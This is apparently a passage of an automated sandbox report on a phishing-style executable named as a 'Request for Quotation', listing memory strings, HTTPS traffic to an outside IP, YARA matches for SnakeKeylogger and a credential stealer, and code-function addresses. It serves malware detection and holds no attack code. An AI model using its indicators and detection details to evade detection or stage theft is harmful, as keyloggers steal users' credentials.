Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000326E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/0
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003278000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49834 version: TLS 1.2

System Summary

Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.3824755853.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: initial sample Static PE information: Filename: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\inf\WmiApRpl\
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\inf\WmiApRpl\WmiApRpl.h
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\inf\WmiApRpl\WmiApRpl.ini
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\inf\WmiApRpl\0009\
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\PerfStringBackup.TMP
Source: C:\Windows\System32\wbem\WMIADAP.exe File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_0153D51C 0_2_0153D51C
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_0741CD7B 0_2_0741CD7B
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_07415350 0_2_07415350
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_074173A8 0_2_074173A8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_07414F18 0_2_07414F18
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_07416E8A 0_2_07416E8A
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_07416E98 0_2_07416E98
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 0_2_07414AE0 0_2_07414AE0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162C19B 9_2_0162C19B
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162A088 9_2_0162A088
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_01625362 9_2_01625362
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162D278 9_2_0162D278
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162D548 9_2_0162D548
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162C468 9_2_0162C468
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162C738 9_2_0162C738
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_016269A0 9_2_016269A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162E988 9_2_0162E988
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162CA08 9_2_0162CA08
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162CCD8 9_2_0162CCD8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_01626FC8 9_2_01626FC8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162CFAC 9_2_0162CFAC
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162F961 9_2_0162F961
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_0162E97C 9_2_0162E97C
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_016229EC 9_2_016229EC
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_01623AB1 9_2_01623AB1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_01623E09 9_2_01623E09
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE1E80 9_2_06DE1E80
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE17A0 9_2_06DE17A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE9C70 9_2_06DE9C70
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEFC68 9_2_06DEFC68
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE9548 9_2_06DE9548
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE0B30 9_2_06DE0B30
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE5028 9_2_06DE5028
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE2968 9_2_06DE2968
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEE6B0 9_2_06DEE6B0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEE6A0 9_2_06DEE6A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE1E70 9_2_06DE1E70
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEDE00 9_2_06DEDE00
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE178F 9_2_06DE178F
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEEF51 9_2_06DEEF51
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEEF60 9_2_06DEEF60
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DECC8F 9_2_06DECC8F
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DECCA0 9_2_06DECCA0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEDDFF 9_2_06DEDDFF
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DED550 9_2_06DED550
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DED540 9_2_06DED540
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEEAF8 9_2_06DEEAF8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEE258 9_2_06DEE258
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEE249 9_2_06DEE249
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE9BFB 9_2_06DE9BFB
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE8B91 9_2_06DE8B91
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEF3B8 9_2_06DEF3B8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEF3A8 9_2_06DEF3A8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE8BA0 9_2_06DE8BA0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEEB08 9_2_06DEEB08
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE9328 9_2_06DE9328
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE0B20 9_2_06DE0B20
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DED0F8 9_2_06DED0F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE0040 9_2_06DE0040
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE5018 9_2_06DE5018
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEF810 9_2_06DEF810
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE0007 9_2_06DE0007
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEF801 9_2_06DEF801
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DED999 9_2_06DED999
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DED9A8 9_2_06DED9A8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_0111D51C 10_2_0111D51C
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053D5020 10_2_053D5020
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053D9360 10_2_053D9360
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053D7FAE 10_2_053D7FAE
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053DC520 10_2_053DC520
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053DC51A 10_2_053DC51A
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053DC4E7 10_2_053DC4E7
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053D934F 10_2_053D934F
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269D28B 14_2_0269D28B
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269C1AB 14_2_0269C1AB
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269C74B 14_2_0269C74B
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269C47B 14_2_0269C47B
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269CA1B 14_2_0269CA1B
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_026969A0 14_2_026969A0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269E988 14_2_0269E988
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_02693E09 14_2_02693E09
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_02696FC8 14_2_02696FC8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269CFBB 14_2_0269CFBB
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269CCEB 14_2_0269CCEB
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_02699DE0 14_2_02699DE0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_02695383 14_2_02695383
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_02693AA1 14_2_02693AA1
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269F974 14_2_0269F974
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_026929EC 14_2_026929EC
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06551E80 14_2_06551E80
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06550B30 14_2_06550B30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_065517A0 14_2_065517A0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655FC68 14_2_0655FC68
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06559C18 14_2_06559C18
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06555028 14_2_06555028
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06559548 14_2_06559548
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06552968 14_2_06552968
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655E258 14_2_0655E258
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655E24A 14_2_0655E24A
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06551E70 14_2_06551E70
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655DE00 14_2_0655DE00
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655EAF8 14_2_0655EAF8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655E6B0 14_2_0655E6B0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655E6AF 14_2_0655E6AF
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655EF60 14_2_0655EF60
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655EB08 14_2_0655EB08
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06550B20 14_2_06550B20
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655178F 14_2_0655178F
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655F3B8 14_2_0655F3B8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06558BA0 14_2_06558BA0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06550040 14_2_06550040
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655F810 14_2_0655F810
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06555018 14_2_06555018
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655F802 14_2_0655F802
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655003F 14_2_0655003F
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655D0F8 14_2_0655D0F8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655CCA0 14_2_0655CCA0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655D550 14_2_0655D550
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655D540 14_2_0655D540
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655DDFF 14_2_0655DDFF
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655D9A7 14_2_0655D9A7
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655D9A8 14_2_0655D9A8
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1418858340.00000000057F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1412513003.000000000127E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamerPzg.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1420336040.000000000A97D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1420336040.000000000A97D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamerPzg.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.000000000434B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1415188848.000000000315D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1419550863.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3825388086.0000000000FD7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Binary or memory string: OriginalFilenamerPzg.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
